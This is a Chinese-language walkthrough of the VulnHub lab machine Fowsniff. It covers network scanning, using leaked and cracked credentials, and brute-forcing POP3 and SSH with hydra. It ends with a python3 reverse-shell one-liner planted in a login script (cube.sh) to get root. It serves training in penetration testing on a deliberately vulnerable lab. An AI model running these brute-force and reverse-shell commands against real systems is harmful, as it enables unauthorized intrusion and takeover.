vulnhub靶场，Fowsniff

vulnhub靶场，Fowsniff

环境准备

靶机下载地址：https://www.vulnhub.com/entry/fowsniff-1,262/
攻击机：kali（192.168.109.128）
靶机：Fowsniff（192.168.109.148）
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境，启动即可，将网段设置为NAT模式

信息收集

使用arp-scan确定目标靶机

确定目标靶机IP为192.168.109.148
使用nmap扫描查看目标靶机端口开放情况

开放端口：22、80、110、143
浏览器访问目标靶机80端口

使用dirb进行网站目录结构扫描

访问assets网页和robots.txt网页，都没有发现啥能利用的位置
看了一下主页，翻译了一下

这里说内部系统遭遇了了数据泄露，导致员工用户名和密码泄露，而且攻击者还能够劫持我们的官方@fowsniffcorp Twitter 帐户
上网站搜索一下这个用户@fowsniffcorp
自动出现了这个网站：https://pastebin.com/NrAqVeeX

攻击者将泄密的账号密码全部放到了这个网站上，根据页面提醒说这些是公司的一些账号密码，显示pop3的服务器是完全开放的，并且MD5是不安全的，要我们自己去解密

渗透过程

将这些密码经过md5解密，得到如下密码，只有一个密码没有解出来

md5解密网站：https://hashes.com/en/decrypt/hash
前面泄露密码的页面还提示对方服务器开启了pop3服务，所以可以使用hydra进行暴力破解
将账号和密码分别放到一个文件里

使用hydra进行暴力破解

hydra -L user.txt -P pass.txt pop3://192.168.109.148

成功破解出一个邮箱账号密码，然后需要使用登入到邮箱的软件，可以使用nc，或者使用foxmail，这里我使用foxmail
下载foxmail，进行配置

点击创建后成功登入靶机邮箱服务器，可以看到有两封邮件

查看邮件内容，发现第二封邮件有一个ssh连接密码

但是不知道是哪个用户的，把这个密码放到密码文件里再次使用hydra进行爆破

hydra -L user.txt -P pass.txt ssh://192.168.109.148

成功破解出一个账号密码，使用ssh进行远程连接

连接成功

权限提升

查看用户的sudo和suid权限

没有发现能提权的命令
经过许久的查找，发现在opt目录下的cube目录下有一个可执行文件cube.sh

查看这个文件的权限

可以看到当前用户是具有全部权限的，查看其文件内容

这个页面感觉很熟悉，在进行ssh连接成功的时候就会弹出这个页面，说明每次进行ssh连接时都会执行这个文件
查看该靶机是否安装了python

可以看到安装了python3，所以可以使用python进行反弹shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.109.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

保存后退出，kali这边使用nc监听4444端口

然后再次使用ssh进行连接

可以看到kali这边成功反弹一个shell，并且为root权限

切换至其root目录，成功获得flag，靶机Fowsniff渗透结束